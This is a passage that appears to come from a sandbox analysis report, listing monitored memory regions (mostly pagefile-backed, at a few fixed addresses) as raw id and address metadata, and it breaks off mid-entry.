region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11160 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11161 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11162 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11163 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11164 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11165 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11166 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11167 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11168 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11169 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11170 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11171 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11178 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11179 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11180 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11181 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11208 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11209 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11230 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11231 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11236 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11266 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11267 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11271 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11272 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11276 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11277 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11284 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11285 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11289 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11290 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11291 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11292 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11297 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11298 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11324 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11325 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11341 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11342 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11343 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11344 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = 